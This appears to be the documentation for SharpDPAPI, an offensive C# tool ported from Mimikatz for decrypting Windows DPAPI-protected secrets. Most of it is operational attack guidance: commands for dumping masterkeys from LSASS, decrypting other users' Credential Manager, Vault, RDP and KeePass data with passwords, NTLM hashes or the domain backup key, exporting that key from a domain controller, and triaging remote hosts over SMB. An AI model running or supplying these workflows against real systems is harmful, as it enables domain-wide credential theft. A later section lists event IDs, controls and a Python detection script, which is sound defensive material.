  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.20.0

What is SharpDPAPI?

SharpDPAPI is a C# port of DPAPI functionality from Mimikatz that enables the extraction and decryption of Windows Data Protection API (DPAPI) protected data. It operationalizes Benjamin Delpy’s work to fit offensive security workflows, allowing practitioners to decrypt credentials, certificates, and other sensitive data protected by DPAPI.
SharpDPAPI is a port of DPAPI functionality from @gentilkiwi’s Mimikatz project. The original logic and implementation credit belongs to Benjamin Delpy.

Understanding DPAPI

The Windows Data Protection API (DPAPI) is a cryptographic API that lets applications protect sensitive data without managing keys themselves: the operating system derives the keys from the user's credentials (user scope) or from machine secrets (machine scope), so the data is normally only recoverable by that user or on that machine.

User DPAPI

Protects user-specific data using keys derived from user passwords

Machine DPAPI

Protects system-level data using keys derived from machine secrets

Domain Backup Key

Domain controllers hold a domain-wide RSA backup key. Every domain user's masterkey file carries a copy of the masterkey encrypted to that key, so whoever holds the backup key can decrypt any domain user's masterkeys

Masterkeys

64-byte random keys stored per user under %APPDATA%\Microsoft\Protect\<SID>\<GUID> (and under %SystemRoot%\System32\Microsoft\Protect\S-1-5-18 for the machine). The key that decrypts a given DPAPI blob is derived from the masterkey named by the GUID in the blob's header, so recovering one masterkey recovers every blob protected under it

DPAPI Architecture

Key Capabilities

  • User Data Extraction
  • Machine Data Extraction
  • Domain Operations
  • Utilities
Decrypt User DPAPI Protected Data:
  • Credential Manager credentials (%APPDATA%\Microsoft\Credentials and %LOCALAPPDATA%\Microsoft\Credentials)
  • Windows Vault data (Internet Explorer and legacy Edge saved web passwords)
  • RDP connection passwords (RDCMan.settings, .rdg files)
  • KeePass ProtectedUserKey.bin files (the Windows user account component of a KeePass composite master key)
  • User certificates and private keys
  • PowerShell credential objects saved with Export-Clixml

Operational Usage

Pre-Domain Compromise

Before obtaining domain administrator privileges, SharpDPAPI can leverage:
Use Mimikatz sekurlsa::dpapi to extract {GUID}:SHA1 masterkey mappings from LSASS memory for currently logged-in users (requires local admin / SeDebugPrivilege on that host; only masterkeys LSASS has cached for active sessions are returned).
# Extract masterkeys with Mimikatz
mimikatz# sekurlsa::dpapi

# Use with SharpDPAPI
SharpDPAPI.exe credentials {GUID1}:SHA1 {GUID2}:SHA1
If you have a user’s password, NTLM hash, or DPAPI prekey, use these directly:
# Using plaintext password
SharpDPAPI.exe credentials /password:Password123!

# Using NTLM hash
SharpDPAPI.exe credentials /ntlm:8846F7EAEE8FB117AD06BDD830B7586C

# Using DPAPI prekey (from sekurlsa::msv)
SharpDPAPI.exe credentials /credkey:abc123...
With local admin rights, use machine triage commands to decrypt system-level DPAPI data:
# Triage all machine DPAPI data
SharpDPAPI.exe machinetriage

Post-Domain Compromise

After obtaining domain admin privileges:
1. Retrieve Domain Backup Key

SharpDPAPI.exe backupkey /server:dc.domain.com /file:key.pvk
The domain backup key is not rotated by default, so once exported it stays valid for as long as the domain exists and can decrypt any domain user's masterkeys.

2. Decrypt All User Masterkeys

SharpDPAPI.exe masterkeys /pvk:key.pvk
Returns {GUID}:SHA1 mappings for every masterkey file the current context can read.

3. Triage All User Data

SharpDPAPI.exe triage /pvk:key.pvk
Automatically decrypts credentials, vaults, RDG files, and certificates for all users whose profiles are readable.

4. Remote System Triage

SharpDPAPI.exe credentials /pvk:key.pvk /server:target.domain.com
Triages DPAPI data on a remote system by reading the users' profile directories over SMB (requires local administrator rights on the target).

Command Categories

User Triage Commands

Machine Triage Commands

Utility Commands

Common Arguments

  • Decryption Methods
  • Targeting
  • Output Options
Ways to Decrypt DPAPI Data:

  Argument            Description
  /pvk:BASE64...      Use a base64-encoded domain backup key
  /pvk:key.pvk        Use a domain backup key file
  /password:X         Decrypt using the user's plaintext password
  /ntlm:X             Decrypt using the user's NTLM hash
  /credkey:X          Use the user's DPAPI credkey (the SHA1-style key reported by Mimikatz)
  /rpc                Ask the domain controller to decrypt masterkeys over the MS-BKRP RPC interface (works for the calling user's own domain-backed masterkeys, no key material needed)
  {GUID}:SHA1 ...     Use explicit masterkey mappings, one per masterkey GUID
  /mkfile:FILE        Load {GUID}:SHA1 masterkey mappings from a file, one per line
  /unprotect          Call CryptUnprotectData() in the current user's context (no keys needed; only that user's own data)

Typical Workflows

# Domain admin: export the backup key once, then triage everything with it
# 1. Retrieve domain backup key
SharpDPAPI.exe backupkey /server:dc.domain.com

# 2. Triage all user DPAPI data on current system
SharpDPAPI.exe triage /pvk:HvG1sAA...

# 3. Triage remote systems
SharpDPAPI.exe credentials /pvk:HvG1sAA... /server:fileserver.domain.com
SharpDPAPI.exe vaults /pvk:HvG1sAA... /server:fileserver.domain.com

# Local admin without the domain key: masterkeys from LSASS, then machine data
# 1. Use Mimikatz to extract user masterkeys
mimikatz# sekurlsa::dpapi

# 2. Triage user DPAPI data with masterkeys
SharpDPAPI.exe triage {GUID1}:SHA1 {GUID2}:SHA1

# 3. Triage machine DPAPI data
SharpDPAPI.exe machinetriage

# Unprivileged user: own data only
# 1. Decrypt current user's RDG files (no elevation needed)
SharpDPAPI.exe rdg /unprotect

# 2. With user's password, decrypt their DPAPI data
SharpDPAPI.exe credentials /password:Password123!
SharpDPAPI.exe vaults /password:Password123!

# Offline analysis of copied files
# 1. Copy user's masterkey folder and DPAPI data to analysis machine

# 2. Decrypt masterkeys with known password
SharpDPAPI.exe masterkeys /target:C:\Evidence\Protect\S-1-5-21-... /password:Password123!

# 3. Decrypt credentials with masterkeys from offline folder
SharpDPAPI.exe credentials /target:C:\Evidence\Credentials /pvk:key.pvk

Detection Considerations

SharpDPAPI operations can be detected through multiple mechanisms. Use appropriate operational security measures.
Behavioral indicators:
  • Reading DPAPI masterkey files (%APPDATA%\Microsoft\Protect\<SID>\) from a process other than LSASS, which is the component that normally reads them on a user's behalf
  • Reading the DPAPI_SYSTEM LSA secret (machine triage elevates to SYSTEM and reads it from the SECURITY hive's Policy\Secrets key)
  • Bulk reading of Credential Manager and Vault files
  • Token manipulation for SYSTEM elevation
  • SMB enumeration of user profiles on remote systems (C$\Users\<user>\AppData\...)
  • MS-BKRP protocol usage for masterkey decryption via the DC (/rpc)
  • Unusual DC RPC calls (LsaRetrievePrivateData against the G$BCKUPKEY_* LSA secrets, which is how backupkey retrieves the domain backup key)
Relevant Windows event IDs:
  • 4656/4663: Access to masterkey files (needs Audit File System enabled and a SACL on the Protect directories)
  • 4662: Domain backup key access on DC
  • 4624/4672: Privileged logon for remote triage
  • 4688: SharpDPAPI.exe process execution (the binary is trivially renamed, so treat the name alone as weak evidence)
Defensive controls:
  • Monitor access to %APPDATA%\Microsoft\Protect\ directories
  • Alert on MS-BKRP backup key retrieval
  • Restrict DPAPI_SYSTEM LSA secret access
  • Monitor for bulk Credential Manager file access
  • Implement conditional access and MFA where possible
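The masterkey and Credential Manager file indicators above translate directly into detection logic over 4663 (object access) events. The Python below is an added example, not part of the SharpDPAPI project, showing three rules run over constructed sample events: a non-LSASS process reading a masterkey file whose path SID differs from the subject SID (cross-user read, what /pvk or SYSTEM triage looks like), one process touching masterkeys of two or more users, and a burst of Credential Manager / Vault file reads. It assumes the events have already been parsed into dicts carrying the standard 4663 EventData field names (SubjectUserSid, SubjectLogonId, ProcessName, ObjectName); the user names, SIDs, paths and the renamed tool binary in the sample are invented for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A masterkey file path: ...\Microsoft\Protect\<SID>\<GUID>. The SID in the path is the owner.
MASTERKEY_RE = re.compile(r"\\Microsoft\\Protect\\(S-1-5-\d+(?:-\d+)*)\\[0-9a-f-]{36}$", re.I)
# Credential Manager and Vault files (both Roaming and Local AppData variants).
CREDFILE_RE = re.compile(r"\\Microsoft\\(?:Credentials|Vault)\\", re.I)
# DPAPI runs inside LSASS, so LSASS is the one process expected to read masterkey files.
EXPECTED_READERS = {r"c:\windows\system32\lsass.exe"}

def detect(events, window=timedelta(minutes=5), cred_threshold=5):
    """Run the three detections over 4663 events given as dicts; returns a list of alerts."""
    alerts = []
    actors = defaultdict(lambda: {"victims": set(), "cred_reads": []})
    for ev in events:
        if ev["EventID"] != 4663:
            continue
        proc = ev["ProcessName"].lower()
        if proc in EXPECTED_READERS:
            continue
        state = actors[(proc, ev["SubjectLogonId"])]
        m = MASTERKEY_RE.search(ev["ObjectName"])
        if m:
            owner = m.group(1).upper()
            state["victims"].add(owner)
            if owner != ev["SubjectUserSid"].upper():
                alerts.append({"rule": "cross-user masterkey read", "severity": "high",
                               "process": proc, "subject": ev["SubjectUserSid"],
                               "victim": owner, "time": ev["TimeCreated"]})
        elif CREDFILE_RE.search(ev["ObjectName"]):
            state["cred_reads"].append(ev["TimeCreated"])
    for (proc, logon), state in actors.items():
        if len(state["victims"]) >= 2:
            alerts.append({"rule": "masterkeys of multiple users read", "severity": "high",
                           "process": proc, "logon_id": logon, "victims": sorted(state["victims"])})
        times = sorted(state["cred_reads"])
        for i, start in enumerate(times):            # sliding window over credential file reads
            burst = [t for t in times[i:] if t - start <= window]
            if len(burst) >= cred_threshold:
                alerts.append({"rule": "bulk credential file read", "severity": "medium",
                               "process": proc, "logon_id": logon, "count": len(burst), "start": start})
                break
    return alerts

def rule_counts(alerts):
    """Summarise alerts as {rule name: count}."""
    counts = defaultdict(int)
    for a in alerts:
        counts[a["rule"]] += 1
    return dict(counts)

# Constructed sample events (invented users, SIDs and paths).
T0 = datetime(2024, 1, 2, 10, 0, 0)
ALICE, BOB, SYSTEM = "S-1-5-21-1111-2222-3333-1104", "S-1-5-21-1111-2222-3333-1105", "S-1-5-18"
LSASS, TOOL = r"C:\Windows\System32\lsass.exe", r"C:\Temp\update.exe"   # TOOL: a renamed triage binary

def _mk_path(user, sid):
    return r"C:\Users\%s\AppData\Roaming\Microsoft\Protect\%s\2f4c9a1e-0d5b-4f8e-9a3c-6b7d8e9f0a1b" % (user, sid)

def _cred_path(user, n):
    return r"C:\Users\%s\AppData\Roaming\Microsoft\Credentials\%032X" % (user, n)

def _ev(secs, proc, subject, logon, obj):
    return {"EventID": 4663, "TimeCreated": T0 + timedelta(seconds=secs), "ProcessName": proc,
            "SubjectUserSid": subject, "SubjectLogonId": logon, "ObjectName": obj, "AccessMask": "0x1"}

SAMPLE_EVENTS = (
    [_ev(0, LSASS, SYSTEM, "0x3e7", _mk_path("alice", ALICE)),   # normal: LSASS serving DPAPI calls
     _ev(1, LSASS, SYSTEM, "0x3e7", _mk_path("bob", BOB))]
    + [_ev(60, TOOL, SYSTEM, "0x3e7", _mk_path("alice", ALICE)),  # triage after elevation to SYSTEM
       _ev(61, TOOL, SYSTEM, "0x3e7", _mk_path("bob", BOB))]
    + [_ev(62 + i, TOOL, SYSTEM, "0x3e7", _cred_path("alice", i)) for i in range(5)]
    + [_ev(900, r"C:\Windows\explorer.exe", ALICE, "0x5a1c3", _cred_path("alice", 9))]  # one read, benign
)
```

Two caveats when deploying this: 4663 only carries ObjectName for files that have a SACL, so the Protect, Credentials and Vault directories need auditing configured before the rules see anything; and the LSASS allowlist means a tool that injects into LSASS is invisible to these rules, so keep the LSASS-access detections from the list above alongside them. A user running SharpDPAPI against only their own data with /password trips none of the cross-user rules and is caught only by the burst rule.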

Prerequisites

Build:
  • Visual Studio 2019 Community Edition or later
  • .NET Framework 3.5 (default target)
  • Can be retargeted to .NET 4.0 or 4.5
Runtime:
  • Windows operating system
  • A .NET Framework version matching the build target installed on the target host
  • Appropriate access rights for target data
Required privileges:
User Commands:
  • Standard user: Can decrypt own data with /unprotect
  • Other users' data: With that user's password, NTLM hash or credkey, their {GUID}:SHA1 masterkey mappings, or the domain backup key
Machine Commands:
  • Local Administrator: Required for DPAPI_SYSTEM access (SharpDPAPI elevates itself to SYSTEM from there)
  • SYSTEM context: For full machine triage
Domain Operations:
  • Domain Admin: For backup key retrieval
  • Local Admin: For remote system triage

Technical Background

DPAPI uses a multi-layer key derivation system:
  1. User credential (SHA1 of the password for local accounts, an NTLM-derived key for domain accounts, or the credkey directly) → PBKDF2 with the salt and iteration count stored in the masterkey file → key that decrypts the masterkey file
  2. Masterkey (64 bytes) → HMAC keyed with the masterkey's SHA1 and salted with the blob's own salt → session key that decrypts the DPAPI blob (this is why a {GUID}:SHA1 mapping is enough to decrypt blobs without the raw masterkey)
  3. DPAPI blob → protected data (the blob header names the masterkey GUID it needs, so you can tell in advance which masterkey to recover)
The domain backup key bypasses step 1: each domain user's masterkey file also holds the masterkey encrypted to the backup key's RSA public key, so the backup key can decrypt any domain user's masterkeys, providing a domain-wide decryption capability.
CryptUnprotectData():
  • Windows API that automatically handles decryption (the key handling happens inside LSASS, which holds the masterkeys)
  • Only works in the context of the user who encrypted the data (or on the same machine, for machine-scope blobs)
  • Doesn't require elevated privileges
  • Used with /unprotect flag
Manual Decryption:
  • Requires masterkeys or backup keys
  • Works across user contexts
  • Can decrypt other users’ data
  • Necessary for remote triage

License

SharpDPAPI is licensed under the BSD 3-Clause license.
SharpDPAPI is a port of Mimikatz DPAPI functionality. All credit for the original implementation goes to Benjamin Delpy (@gentilkiwi).